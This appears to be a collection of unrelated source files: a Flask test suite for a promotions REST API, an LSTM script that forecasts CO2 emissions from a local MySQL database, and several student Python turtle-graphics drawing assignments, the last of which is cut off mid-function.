#### File: promotions/tests/test_service.py ```python import os import logging import unittest from datetime import datetime from unittest import TestCase from flask_api import status # HTTP Status Codes from service.models import Promotion, DataValidationError, db, PromoType, Product from service import app from service.service import init_db from .factories import PromotionFactory, ProductFactory from freezegun import freeze_time DATABASE_URI = os.getenv( "DATABASE_URI", "postgres://postgres:postgres@localhost:5432/postgres" ) ###################################################################### # T E S T C A S E S ###################################################################### @freeze_time("2020-11-03") class TestPromotionService(TestCase): """ REST API Server Tests """ @classmethod def setUpClass(cls): """ Run once before all tests """ app.config["TESTING"] = True app.config["DEBUG"] = False app.config["SQLALCHEMY_DATABASE_URI"] = DATABASE_URI app.logger.setLevel(logging.CRITICAL) init_db() @classmethod def tearDownClass(cls): pass def setUp(self): """ Runs before each test """ db.drop_all() # clean up the last tests db.create_all() # create new tables self.app = app.test_client() def tearDown(self): db.session.remove() db.drop_all() def _create_promotions(self, count): """ Factory method to create promotions in bulk """ promotions = [] for _ in range(count): test_promotion = PromotionFactory() logging.debug(test_promotion.serialize()) resp = self.app.post( "/promotions", json=test_promotion.serialize(), content_type="application/json", ) self.assertEqual( resp.status_code, status.HTTP_201_CREATED, "Could not create test promotion", ) new_promotion = resp.get_json() test_promotion.id = new_promotion["id"] promotions.append(test_promotion) return promotions ###################################################################### # P L A C E T E S T C A S E S H E R E ###################################################################### def test_index(self): """ Test index call """ resp = self.app.get("/") self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertIn(b"NYU DevOps eCommerce Promotions", resp.data) def test_create_promotion(self): """ Create a new Promotion """ test_promotion = PromotionFactory() logging.debug(test_promotion) resp = self.app.post( "/promotions", json=test_promotion.serialize(), content_type="application/json", ) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # Check the data is correct new_promotion = resp.get_json() self.assertEqual( new_promotion["title"], test_promotion.title, "Titles do not match" ) self.assertEqual( new_promotion["description"], test_promotion.description, "Descriptions do not match", ) self.assertEqual( new_promotion["promo_code"], test_promotion.promo_code, "Promo Codes do not match", ) self.assertEqual( new_promotion["promo_type"], test_promotion.promo_type.name, "Promo Types do not match", ) self.assertEqual( new_promotion["amount"], test_promotion.amount, "Amounts do not match" ) self.assertEqual( new_promotion["start_date"], test_promotion.start_date.isoformat(), "Start Date does not match", ) self.assertEqual( new_promotion["end_date"], test_promotion.end_date.isoformat(), "End Date does not match", ) self.assertEqual( new_promotion["is_site_wide"], test_promotion.is_site_wide, "Is Site Wide bool does not match", ) def test_create_promotion_with_product(self): """ Create a new Promotion With Product """ resp = self.app.post( "/promotions", json={ "id": 1, "title": "Halloween Special", "description": "Some items off in honor of the spookiest month.", "promo_code": "hween", "promo_type": "DISCOUNT", "amount": 25, "start_date": "2020-10-20T00:00:00", "end_date": "2020-11-01T00:00:00", "is_site_wide": False, "products": [123, 456], }, content_type="application/json", ) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # Check the promotion got created new_promotion = resp.get_json() self.assertEqual( new_promotion["title"], "Halloween Special", "Title does not match" ) self.assertEqual( new_promotion["products"], [123, 456], "Products does not match" ) def test_get_promotion(self): """ Get a single Promotion """ # get the id of a promotion test_promotion = self._create_promotions(1)[0] resp = self.app.get( "/promotions/{}".format(test_promotion.id), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(data["title"], test_promotion.title) def test_get_promotion_not_found(self): """ Get a Promotion thats not found """ resp = self.app.get("/promotions/0") self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_list_promotion(self): """ List all promotions in the database """ # create two promotions test_promotion00 = self._create_promotions(1)[0] test_promotion01 = self._create_promotions(1)[0] # if it gets 200 status, we pass resp = self.app.get("/promotions") self.assertEqual(resp.status_code, status.HTTP_200_OK) # check that the ID of test promos match JSON returned data = resp.get_json() self.assertEqual(data[0]["id"], test_promotion00.id) self.assertEqual(data[1]["id"], test_promotion01.id) def test_update_promotion(self): """ Update an existing Promotion """ # create a promotion to update test_promotion = PromotionFactory() resp = self.app.post( "/promotions", json=test_promotion.serialize(), content_type="application/json", ) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # update the promotion new_promotion = resp.get_json() new_promotion["title"] = "unknown" new_promotion["products"] = [123] resp = self.app.put( "/promotions/{}".format(new_promotion["id"]), json=new_promotion, content_type="application/json", ) self.assertEqual(resp.status_code, status.HTTP_200_OK) updated_promotion = resp.get_json() self.assertEqual(updated_promotion["title"], "unknown") self.assertEqual(updated_promotion["products"], [123]) # check that trying to update a non-existent promotion returns 404 not found resp = self.app.put( "/promotions/{}".format("999999999999999"), json=new_promotion, content_type="application/json", ) self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_delete_promotion(self): """ Delete a Promotion """ test_promotion = self._create_promotions(1)[0] resp = self.app.delete( "/promotions/{}".format(test_promotion.id), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(len(resp.data), 0) # make sure they are deleted resp = self.app.get( "/promotions/{}".format(test_promotion.id), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) # If you call the DELETE function on a promotion that doesn't exist, should return OK def test_delete_promotion_not_exist(self): """ Delete a Promotion that does not exist """ resp = self.app.delete( "/promotions/{}".format("9999999999999999"), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_200_OK) def test_query_promotion_list_by_site_wide(self): """ Query all promotions in the database by site-wide """ # Create a set of promotions promotions, is_site_wide_list = [], [True, False, True] for site_wide in is_site_wide_list: test_promotion = PromotionFactory() test_promotion.is_site_wide = site_wide resp = self.app.post( "/promotions", json=test_promotion.serialize(), content_type="application/json", ) new_promotion = resp.get_json() promotions.append(new_promotion) logging.debug(new_promotion) resp = self.app.get("/promotions", query_string=f"is_site_wide={True}") self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() for promotion, site_wide in zip(promotions, is_site_wide_list): if site_wide: self.assertIn(promotion, data) else: self.assertNotIn(promotion, data) def test_query_promotion(self): """ Query all promotions in the database by multiple parameters """ product_1 = Product() product_1.id = 100 product_2 = Product() product_2.id = 200 db.session.add(product_1) db.session.add(product_2) # Define the test cases test_cases = [ { "title": "0", "promo_code": "XYZ0000", "promo_type": PromoType.DISCOUNT, "amount": 50, "is_site_wide": False, "start_date": datetime(2020, 10, 17), "end_date": datetime(2020, 10, 21), }, { "title": "1", "promo_code": "XYZ0001", "promo_type": PromoType.DISCOUNT, "amount": 10, "is_site_wide": True, "start_date": datetime(2020, 10, 21), "end_date": datetime(2021, 10, 23), }, { "title": "2", "promo_code": "XYZ0002", "promo_type": PromoType.BOGO, "amount": 2, "is_site_wide": False, "start_date": datetime(2020, 10, 14), "end_date": datetime(2020, 10, 18), }, { "title": "3", "promo_code": "XYZ0003", "promo_type": PromoType.DISCOUNT, "amount": 20, "is_site_wide": False, "start_date": datetime(2020, 10, 14), "end_date": datetime(2021, 10, 18), }, ] tests = [ ("is_site_wide=true", 1), ("is_site_wide=true&product=100", 0), ("is_site_wide=true&active=1", 1), ("is_site_wide=false&active=0", 2), ("is_site_wide=true&title=3", 0), ("is_site_wide=false", 3), ("is_site_wide=false&product=200", 1), ("promo_code=XYZ0004", 0), ("promo_code=XYZ0003", 1), ("promo_code=XYZ0003&is_site_wide=false", 1), ("amount=20&is_site_wide=false", 1), ("amount=20&is_site_wide=true", 0), ("promo_type=DISCOUNT&is_site_wide=true", 1), ("start_date=2020-10-17T00:00:00", 1), ("promo_type=BOGO", 1), ("start_date=Sat, 17 Oct 2020 00:00:00 GMT", 1), ( "start_date=Tue, 14 Oct 2020 00:00:00 GMT&end_date=Wed, 18 Oct 2020 00:00:00 GMT", 1, ), ("duration=4", 2), ("active=0", 2), ("active=1", 2), ("product=100", 3), ("product=200", 1), ("", 4), ] # Create the set of Promotions for test_case in test_cases: test_promotion = Promotion() if not test_case["is_site_wide"]: test_promotion.products = [product_1] if test_case["promo_code"] == "XYZ0003": test_promotion.products.append(product_2) for attribute in test_case: setattr(test_promotion, attribute, test_case[attribute]) resp = self.app.post( "/promotions", json=test_promotion.serialize(), content_type="application/json", ) # Carry out the tests for query_str, length_of_result in tests: logging.debug(query_str) resp = self.app.get("/promotions", query_string=query_str) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() print(query_str) self.assertEqual(len(data), length_of_result) def test_cancel_promotion(self): """ Cancel a promotion """ # try to cancel it before it's in there resp = self.app.post( "/promotions/{}/cancel".format(1), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) # create a new promotion test_promotion = self._create_promotions(1)[0] # cancel the promotion resp = self.app.post( "/promotions/{}/cancel".format(test_promotion.id), content_type="application/json", ) # if it gets 200 status, we pass self.assertEqual(resp.status_code, status.HTTP_200_OK) def test_apply_best_promotions(self): """ Test Apply Best Promotion """ # API: /promotions/apply?product_id=product_price # Product - Promotion mapping # Product 1 ## Available: Promo 1, Promo 2 (Store-wide), Promo 3, Promo 6 (Store-wide, Expired) ## Best: Promo 3 (BOGO) # Product 2 ## Available: Promo 1, Promo 2 (Store-wide), Promo_4, Promo 6 (Store-wide, Expired) ## Best: Promo 4 (80%) # Product 3 ## Available: Promo 2 (Store-wide), Promo 6 (Store-wide, Expired) ## Best: Promo 2 (10%) # Product 4 ## Available: Promo 2 (Store-wide), Promo 5, Promo 6 (Store-wide, Expired) ## Best: Promo 5 (FIXED, 150) product_1 = Product() product_1.id = 100 product_2 = Product() product_2.id = 200 product_3 = Product() product_3.id = 300 product_4 = Product() product_4.id = 400 db.session.add(product_1) db.session.add(product_2) db.session.add(product_3) db.session.add(product_4) # Define the promotions promotions = [ { "promo_code": "promo_code_1", "promo_type": PromoType.DISCOUNT, "amount": 40, "is_site_wide": False, "start_date": datetime(2020, 9, 2), "end_date": datetime(2021, 10, 21), }, { "promo_code": "promo_code_2", "promo_type": PromoType.DISCOUNT, "amount": 10, "is_site_wide": True, "start_date": datetime(2020, 8, 21), "end_date": datetime(2021, 10, 23), }, { "promo_code": "promo_code_3", "promo_type": PromoType.BOGO, "amount": 1, "is_site_wide": False, "start_date": datetime(2020, 9, 1), "end_date": datetime(2021, 5, 30), }, { "promo_code": "promo_code_4", "promo_type": PromoType.DISCOUNT, "amount": 80, "is_site_wide": False, "start_date": datetime(2020, 10, 14), "end_date": datetime(2021, 5, 18), }, { "promo_code": "promo_code_5", "promo_type": PromoType.FIXED, "amount": 150, "is_site_wide": False, "start_date": datetime(2020, 10, 14), "end_date": datetime(2021, 10, 18), }, { "promo_code": "promo_code_6", "promo_type": PromoType.DISCOUNT, "amount": 80, "is_site_wide": True, "start_date": datetime(2020, 9, 14), "end_date": datetime(2020, 10, 15), }, ] tests = [ ("100=1000&200=5000", []), ( "100=1000&200=5000&300=268&400=255", [ {"100": "promo_code_3"}, {"200": "promo_code_4"}, {"300": "promo_code_2"}, {"400": "promo_code_5"}, ], ), ("", []), ] # Carry out the tests without promotions in the system for cart, result in tests[:1]: resp = self.app.get("/promotions/apply", query_string=cart) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(data, result) # Create the set of Promotions logging.debug("Creating promotions") for promo in promotions: test_promotion = PromotionFactory() for attribute in promo: setattr(test_promotion, attribute, promo[attribute]) if promo["promo_code"] == "promo_code_1": test_promotion.products.append(product_1) test_promotion.products.append(product_2) elif promo["promo_code"] == "promo_code_3": test_promotion.products.append(product_1) elif promo["promo_code"] == "promo_code_4": test_promotion.products.append(product_2) elif promo["promo_code"] == "promo_code_5": test_promotion.products.append(product_4) logging.debug( f" Promo: {promo['promo_code']} (Promo ID: {test_promotion.id}): Products - {test_promotion.products}" ) self.app.post( "/promotions", json=test_promotion.serialize(), content_type="application/json", ) logging.debug("Promotions created") # Carry out the tests for cart, result in tests[1:]: logging.debug(cart) resp = self.app.get("/promotions/apply", query_string=cart) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(data, result) # --------------------------------------------------------------- # > Test Cases for Error Handlers < # --------------------------------------------------------------- def test_invalid_content_type(self): """ Test Invalid Content Type """ resp = self.app.post( "/promotions", json="This is a string", content_type="text/html" ) print(resp.__dir__()) print(resp.get_json()) self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE) def test_bad_request(self): """ Test Bad Request """ resp = self.app.post( "/promotions", json="{'test': 'promotion'}", content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_method_not_allowed(self): """ Test Method Not Allowed """ resp = self.app.put("/promotions") self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED) ###################################################################### # M A I N ###################################################################### if __name__ == "__main__": unittest.main() ```
{ "source": "2020-SKKU-S-HERO/mobius_adaptation", "score": 3 }
#### File: mobius_adaptation/database/pred_model_update.py ```python import pandas as pd import numpy as np from sklearn.preprocessing import MinMaxScaler import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers from tensorflow.keras.layers import LSTM, Dense, Dropout, Activation from tensorflow.keras.models import Sequential from sqlalchemy import create_engine from datetime import timedelta engine = create_engine('mysql+pymysql://root:shero@localhost/sheroDB', echo=True) def get_data_from_db(): sql = 'select * from co2_emissions where location="인천"' data = pd.read_sql(sql, engine) data['date_time'] = pd.to_datetime(data['date_time']) data = data.set_index('date_time',inplace=False) data = data.resample(rule='1440T').sum() return data def scale(df): scaler = MinMaxScaler(feature_range=(0, 1)) scale_cols = ['limestone', 'clay', 'silica_stone', 'iron_oxide', 'gypsum', 'coal', 'emissions'] scaled_data = scaler.fit_transform(df[scale_cols]) scaled_data = pd.DataFrame(scaled_data) scaled_data.columns = scale_cols #print("scaled_data ::::") #print(scaled_data.head(31)) return (scaled_data, scaler) def denormalize(feature, pred ,scaler): denorm_predict = [] feature["emissions"] = pred denorm = scaler.inverse_transform(feature) for item in denorm: denorm_predict.append(item[6]) return np.array(denorm_predict) def feature_label_split(df): feature_cols = ['limestone', 'clay', 'silica_stone', 'iron_oxide', 'gypsum', 'coal'] label_cols = ['emissions'] train_feature = df[feature_cols] train_label = df[label_cols] return (train_feature, train_label) def make_3D(feature, label, window_size): dataX, dataY = [], [] for i in range(len(feature)-window_size): dataX.append(np.array(feature.iloc[i:i+window_size])) dataY.append(np.array(label.iloc[i+window_size])) return (np.array(dataX), np.array(dataY)) def make_single_3D(feature, window_size): dataX = [] for i in range(len(feature)-window_size): dataX.append(np.array(feature.iloc[i:i+window_size])) return np.array(dataX) data = get_data_from_db() train, scaler = scale(data) #train = data feature, label = feature_label_split(train) train_feature_3d, train_label_3d = make_3D(feature, label, 30) def build_model(feature_3d): model = Sequential() model.add(LSTM(64, input_shape=(feature_3d.shape[1], feature_3d.shape[2]),activation='relu',return_sequences=False)) model.add(Dropout(0.3)) model.add(Dense(1)) model.compile(loss='mean_squared_error', optimizer='adam') return model test_feature = pd.concat([feature.iloc[-90:, :], feature.iloc[-365:-305, :]], ignore_index=True) denom_feature = pd.concat([feature.iloc[-60:, :], feature.iloc[-365:-305, :]], ignore_index=True) #print(denom_feature.head(20)) #print(denom_feature.info()) #print() test_label = np.array(label.iloc[-60:, :]).flatten() test_label = np.append(test_label, np.zeros(60)) test_feature_3d = make_single_3D(test_feature, 30) #print(train.iloc[-90:-40, :]) #print(test_feature.head()) #print(test_label) model = build_model(train_feature_3d) hist = model.fit(train_feature_3d, train_label_3d, epochs=300, batch_size=64) predict_value = model.predict(test_feature_3d) predict_value = predict_value.flatten() denom_predict_value = denormalize(denom_feature, predict_value, scaler) denom_real_value = np.array(data.iloc[-60:, 0]).flatten() denom_real_value = np.append(denom_real_value, np.zeros(60)) #print(denom_real_value) #print(data.head()) loc=[] for i in range(120): loc.append(['인천']) loc = np.array(loc).flatten() pred_date = data.iloc[-120:] pred_date = np.array(pred_date.index) pred_date = pd.DatetimeIndex(pred_date) + timedelta(days=60) pred_date = np.array(pred_date) #dic = {'date_time' : pred_date, 'actual_value' : test_label, 'predict_value' : predict_value , 'location' : loc} dic = {'date_time' : pred_date, 'actual_value' : denom_real_value, 'predict_value' : denom_predict_value , 'location' : loc} dff = pd.DataFrame(dic) dff = pd.DataFrame(dic) print(dff.head(20)) dff.to_sql(name='predict_value',con=engine, if_exists='append') ```
{ "source": "2020-Spring-CSC-226/a03-master", "score": 3 }
#### File: 2020-Spring-CSC-226/a03-master/a03_dabbsr.py ```python <NAME> dabbsr https://docs.google.com/document/d/1NYZeAN_fGb0iTEdF8upy8mrT_fNUva248VOr3c7x7pY/edit# import turtle wn = turtle.Screen() wn.colormode(255) wn.bgcolor(5,160,170) luigi = turtle.Turtle() def red_shape(): """ first """ luigi.color("Red") luigi.begin_fill() luigi.speed(0) luigi.left(15) luigi.forward(45) print(luigi.pos()) luigi.left(60) luigi.forward(45) luigi.left(40) luigi.forward(132) print(luigi.pos()) luigi.setpos(0,0) luigi.end_fill() def yellow_shape(): """ second """ luigi.color("Yellow") luigi.begin_fill() luigi.forward(70) print(luigi.pos()) luigi.setpos(-0.67,174.75) luigi.setpos(0,0) luigi.end_fill() def og_shape(): """ third """ luigi.color("Orange") luigi.setheading(180) luigi.begin_fill() luigi.forward(200) luigi.setpos(-29.58,63.44) luigi.setpos(0,0) luigi.end_fill() def green_shape(): """ fourth """ luigi.color("Green") luigi.setheading(180) luigi.begin_fill() luigi.forward(200) luigi.setpos(-29.58,-63.44) luigi.setpos(0,0) luigi.end_fill() def wt_shape(): """ fifth """ luigi.color("White") luigi.begin_fill() luigi.setpos(-29.58,-63.44) print(luigi.pos()) luigi.setpos(-0.67,-174.75) luigi.setpos(0,0) luigi.end_fill() def pnk_shape(): """ final """ luigi.color("Pink") luigi.setheading(0) luigi.begin_fill() luigi.left(-15) luigi.forward(45) print(luigi.pos()) luigi.left(-60) luigi.forward(45) luigi.left(-40) luigi.forward(132) print(luigi.pos()) luigi.setpos(0,0) luigi.end_fill() def main(): """ puts all sections together of the pop art """ red_shape() yellow_shape() og_shape() green_shape() wt_shape() pnk_shape() wn.title("Pop Art") wn.exitonclick() main() ``` #### File: 2020-Spring-CSC-226/a03-master/A03_davisj2.py ```python import turtle def move(t, x, y): t.up() t.setpos(x, y) t.down() def borders(t): t.penup() t.setpos(-250,-250) t.pendown() t.pensize(20) for i in range(4): t.forward(500) t.left(90) def ground(t): t.penup() t.setpos(-250,-200) t.pendown() t.color('#00ff00') t.begin_fill() t.forward(500) t.right(90) t.forward(50) t.right(90) t.forward(500) t.right(90) t.forward(50) t.end_fill() def house(t): t.penup() t.setpos(-190,-200) t.pendown() t.color('#964b00') t.begin_fill() for i in range(4): t.forward(260) t.left(90) t.end_fill() def roof(t): t.penup() t.setpos(-190,60) t.pendown() t.color('#B5651D') t.begin_fill() for i in range(3): t.forward(260) t.left(120) t.end_fill() def sun(t): t.penup() t.setpos(160,60) t.pendown() t.color('#ffff00') t.begin_fill() t.circle(70) t.end_fill() def main(): J = turtle.Turtle() X = turtle.Turtle() C = turtle.Turtle() T = turtle.Turtle() S = turtle.Turtle() wn = turtle.Screen() wn.bgcolor('#add8e6') wn.screensize(500,500) borders(J) ground(X) house(C) roof(T) sun(S) wn.exitonclick() main() ``` #### File: 2020-Spring-CSC-226/a03-master/a03_fotim.py ```python import turtle from time import sleep def move (t, x, y): """ Moves the turtle to a specified location using X, Y coordinate pairs. :param t: The turtle to be moved :param x: The X coordinate :param y: The Y coordinate :return: None """ t.up() t.setpos(x, y) t.down() def OutsideRing(Outside, i): move(Outside, -45, 170) while i < 3: # The loop that creates the outer ring. i += 1 Outside.fd(80) Outside.right(80) Outside.fd(20) Outside.left(65) Outside.circle(-100, 90) Outside.left(65) Outside.fd(20) Outside.right(80) i = 0 def InnerRing(Inside, i, k): move(Inside, -5, 115) while i < 3: # The loop that creates the inner ring. i += 1 Inside.circle(-70, 120) Inside.right(90) # Turns to create each arrow. Inside.back(20) Inside.fd(60) Inside.right(90) Inside.fd(10) while k < 3: # The loop that creates the tips of the arrows within the inner ring. k += 1 Inside.left(120) Inside.fd(20) k = 0 Inside.back(10) Inside.left(90) Inside.fd(10) Inside.back(50) Inside.left(90) # The end of each arrow def SCP(Letters): move(Letters, -67, -100) # Draws the S Letters.fd(18) Letters.back(18) Letters.circle(-20, -180) Letters.circle(20, -180) Letters.back(18) move(Letters, 8, -102) # Draws the C Letters.fd(10) Letters.back(10) Letters.circle(-38, -180) Letters.back(10) # print(Letters.pos()) move(Letters, 38, -178) # Draws the P Letters.right(90) Letters.fd(60) Letters.circle(-20, 270) def main(): wn = turtle.Screen() Outside = turtle.Turtle() Inside = turtle.Turtle() Letters = turtle.Turtle() i = 0 k = 0 Outside.width(10) Inside.width(10) Letters.width(15) wn.bgcolor(0, 0, 0) Outside.pencolor(1, 1, 1) Inside.pencolor(1, 1, 1) Letters.pencolor(1, 1, 1) OutsideRing(Outside, i) InnerRing(Inside, i, k) SCP(Letters) wn.exitonclick() main() ``` #### File: 2020-Spring-CSC-226/a03-master/A03_jacciboggs.py ```python import turtle #make the roof made of bricks def make_roof(wn, shape): """ Draws a roof made of bricks :param wn: :param shape: :return: """ wn.register_shape("Bricks.gif") #registers a sh #draw the body of the house - a rectangle def draw_square(houseturtle): """ :param houseturtle: :return: """ houseturtle.color(50, 168, 82) houseturtle.penup() houseturtle.goto(-250, -250) houseturtle.pendown() houseturtle.fillcolor(50, 168, 82) for i in range (4): houseturtle.forward(300) houseturtle.left(90) #draw the roof of the house - a triangle on top of the rectangle def draw_roof(houseturtle): """ :param houseturtle: :return: """ houseturtle.color(50, 168, 82) houseturtle.penup() houseturtle.goto(-230, -230) houseturtle.pendown() houseturtle.left(180) houseturtle.forward(400) houseturtle.begin_fill() for i in range (3): houseturtle.right(120) houseturtle.forward(200) houseturtle.end_fill() houseturtle.penup() #draw a chimney - a small rectangle at the top of the triangle #draw smoke coming out of the chimney #main def main(): """ :return: """ houseturtle = turtle.Turtle() wn = turtle.Screen() wn.colormode(255) houseturtle.pensize (10) draw_square(houseturtle) draw_roof(houseturtle) #draw_chimney(houseturtle) #draw_smoke(houseturtle) wn.exitonclick() main() ``` #### File: 2020-Spring-CSC-226/a03-master/a03_quintanarpenaa.py ```python import turtle def smokey(n): """creates smoke""" n.left(-10) n.circle(20, extent=-180) n.right(180) def rep(bd): """moves the turtle back into position""" bd.penup() bd.right(90) bd.fd(320) bd.right(90) bd.fd(285) bd.left(180) bd.pendown() def smoke(mn): """creates smoke""" mn.left(-10) mn.circle(20, extent=-180) mn.right(180) def chimmeny(ui): ui.color('black') ui.begin_fill() ui.right(30) ui.fd(20) ui.left(30) ui.fd(40) ui.left(90) ui.fd(10) ui.left(90) ui.fd(56) ui.left(180) ui.fd(56) ui.end_fill() def reposss(ht): ht.penup() ht.left(90) ht.fd(373) ht.pendown() def reposs(yu): """Positions the turtle to make a door""" yu.penup() yu.fd(25) yu.right(90) yu.fd(200) yu.left(90) yu.fd(75) yu.pendown() def door(rt): """makes a door""" rt.color("red") rt.begin_fill() rt.fd(50) rt.left(90) rt.fd(70) rt.left(90) rt.fd(50) rt.left(90) rt.fd(70) rt.end_fill() rt.color("blue") rt.penup() rt.backward(25) rt.left(90) rt.fd(10) rt.pendown() rt.begin_fill() rt.circle(5) rt.end_fill() rt.penup() rt.backward(10) rt.right(90) rt.fd(25) rt.left(90) rt.pendown() def repos(er): """repositions the turtle again for the roof""" er.penup() er.backward(260) er.left(90) er.fd(100) er.right(90) er.fd(25) er.pendown() def repo(op): """makes the turtle go in position to make windows""" op.left(90) op.fd(100) op.right(90) def roof(ro): """makes a roof""" ro.color("blue") ro.begin_fill() ro.backward(50) ro.left(60) ro.fd(250) ro.right(120) ro.fd(250) ro.left(60) ro.backward(250) ro.end_fill() def reposition(qw): """repositions the turtle on the bottom left of the screen""" qw.penup() qw.right(135) qw.fd(350) qw.right(-135) qw.pendown() def house(wt): """Makes the frame of the house""" wt.color("black") wt.begin_fill() wt.fd(200) wt.left(90) wt.fd(200) wt.left(90) wt.fd(200) wt.left(90) wt.fd(200) wt.left(90) wt.end_fill() def windows(nt): """This makes windows """ nt.color("yellow") nt.begin_fill() nt.fd(70) nt.left(90) nt.fd(70) nt.left(90) nt.fd(70) nt.left(90) nt.fd(70) nt.end_fill() nt.left(180) nt.fd(35) nt.right(90) nt.color("black") nt.fd(70) nt.backward(35) nt.left(90) nt.fd(35) nt.backward(70) nt.right(90) nt.penup() nt.backward(35) nt.fd(130) nt.pendown() def main(): roe = turtle.Turtle() roe.speed(0) wn = turtle.Screen() wn.bgcolor("#738678") roe.pensize(2) reposition(roe) house(roe) repo(roe) for i in range(2): windows(roe) repos(roe) roof(roe) reposs(roe) door(roe) reposss(roe) chimmeny(roe) for i in range(5): smoke(roe) roe.left(-180) for i in range(5): roe.penup() smoke(roe) roe.pendown() rep(roe) for i in range(7): smokey(roe) wn.exitonclick() main() # turtle.color ("#738678") #this code makes a circle the color xanadu # turtle.begin_fill() # turtle.circle(60) # turtle.end_fill() ``` #### File: 2020-Spring-CSC-226/a03-master/a03_redmonl.py ```python import turtle wn = turtle.Screen() # creates the screen wn.bgcolor('pink') bud = turtle.Turtle() # creates the first turtle bud.hideturtle() petal = turtle.Turtle() # creates the second turtle petal.hideturtle() petal.up() petal.goto(17,25) # puts the second turtle into position bud.fillcolor('yellow') # creates the center of the flower bud.begin_fill() bud.circle(20) bud.end_fill() def draw_petal(): # the parameters for the petal petal.fillcolor('#CC0000') petal.begin_fill() petal.circle(100,70) petal.left(110) petal.circle(100,70) petal.end_fill() def main(): # draws the flower draw_petal() petal.goto(8,2) draw_petal() petal.goto(-20,20) draw_petal() petal.goto(17,30) draw_petal() petal.goto(10,4) draw_petal() petal.goto(-20,18) draw_petal() petal.goto(0,40) draw_petal() petal.goto(17,10) draw_petal() petal.goto(-10,5) draw_petal() petal.goto(-10,35) draw_petal() petal.goto(17,12) draw_petal() petal.goto(0,0) draw_petal() petal.goto(-17,30) draw_petal() main() wn.mainloop() ``` #### File: 2020-Spring-CSC-226/a03-master/a03_roshan.py ```python import turtle house = turtle.Turtle() def make_triangle(): """ makes a triangle on top of the main houses """ house.right(135) house.forward(200) house.right(113) house.forward(163) house.penup() house.right(24) house.forward(195) house.right(90) house.forward(100) def make_square(): """ makes the square :return: """ house.penup() house.left(180) house.forward(200) house.left(90) house.pendown() house.forward(200) house.left(90) house.forward(200) house.left(90) house.forward(200) house.left(90) house.forward(200) def make_door(): """ makes the door of the house """ house.pendown() house.right(90) house.forward(45) house.left(90) house.forward(25) house.left(90) house.forward(45) def main(): """ bringing all the sections together to make the house """ wn = turtle.Screen() wn.bgcolor("#FF0000") #hexcode for red wn.title("house") make_square() make_triangle() make_door() wn.exitonclick() main() ``` #### File: 2020-Spring-CSC-226/a03-master/Jarju_a03.py ```python import turtle # Imports turtle from the python Library def draw_base(cup): """ draws the base of a cup :param cup: a Turtle object :return: None (void function) """ cup.hideturtle() cup.color('#61d4b3') cup.pensize(10) cup.begin_fill() for i in range(4): cup.forward(45) cup.right(90) cup.penup() cup.forward(45) cup.right(90) cup.forward(20) cup.circle(15) cup.end_fill() def curve(love): """ draws the love sign on the table :param love: a Turtle object :return: None (void function) """ love.hideturtle() love.begin_fill() love.setpos(0, 10) for i in range(50): # Setting up a loop love.right(1) love.forward(1) love.speed(0) love.color('#c81912') # First color is the border color and second color is the fill color. love.begin_fill() love.left(140) # Turns the turtle left at an angle of 140 degrees. love.forward(95) love.color('#c81912') love.end_fill() def draws_table(table): """"" draws a table :param table: a Turtle object :return: None (void function) """ table.hideturtle() table.pensize(18) table.penup() table.setpos(-45, -59) table.pendown() table.begin_fill() table.color('#00ff22') table.forward(100) table.right(45) table.forward(100) table.right(125) table.forward(30) table.right(45) table.forward(65) table.left(35) table.forward(125) table.left(53) table.forward(62) table.right(90) table.forward(30) table.right(94) table.forward(98) table.right(55) table.forward(50) table.end_fill() def make_text(txt): """ Writes text to the screen. :param txt: a Turtle object :return: None """ txt.hideturtle() txt.penup() txt.color("#ffcc00") txt.setpos(0, 120) txt.write('Computer Science Is Life!', move=False, align='center', font=("Algerian", 20, ("bold", "normal"))) def main(): wn = turtle.Screen() wn.bgcolor('#ffffff') # Sets background color. cup = turtle.Turtle() table = turtle.Turtle() love = turtle.Turtle() txt = turtle.Turtle() # Call Functions draw_base(cup) draws_table(table) make_text(txt) curve(love) wn.exitonclick() main() #call main() ``` #### File: 2020-Spring-CSC-226/a03-master/reevesv2.py ```python import turtle def house(ab): """ Docstring for function_1 """ pass ab.begin_fill() for i in range(2): ab.forward(500) ab.left(90) ab.forward(250) ab.left(90) ab.end_fill() # .... def outlinehouse(ab): """ Docstring for function_1 """ pass for i in range(2): ab.forward(500) ab.left(90) ab.forward(250) ab.left(90) def roof(cd): """ this function draws the wicked cool roof """ pass cd.begin_fill() cd.forward(600) cd.left(150) cd.forward(500) cd.left(120) cd.forward(200) cd.right(90) cd.forward(167) cd.left(90) cd.forward(50) cd.end_fill() # ... def outlineroof(cd): """ this function draws the wicked cool roof """ pass cd.forward(600) cd.left(150) cd.forward(500) cd.left(120) cd.forward(200) cd.right(90) cd.forward(167) cd.left(90) cd.forward(50) # ... def pole(ef): """ draw the pole for the flag """ pass ef.begin_fill() ef.left(90) for i in range(2): ef.forward(10) ef.left(90) ef.forward(350) ef.left(90) ef.end_fill() #..... def flag(gh): """ this function draws the flag """ pass gh.begin_fill() for i in range(2): gh.forward(90) gh.left(90) gh.forward(60) gh.left(90) gh.end_fill() #.... def cross(ij): """ this function draws the white cross on the swiss flag """ ij.begin_fill() for i in range(4): ij.left(90) ij.forward(25) ij.left(90) ij.forward(5) ij.left(90) ij.forward(25) ij.end_fill() #end of function def door (kl): """ this function draws the door the the door knob """ 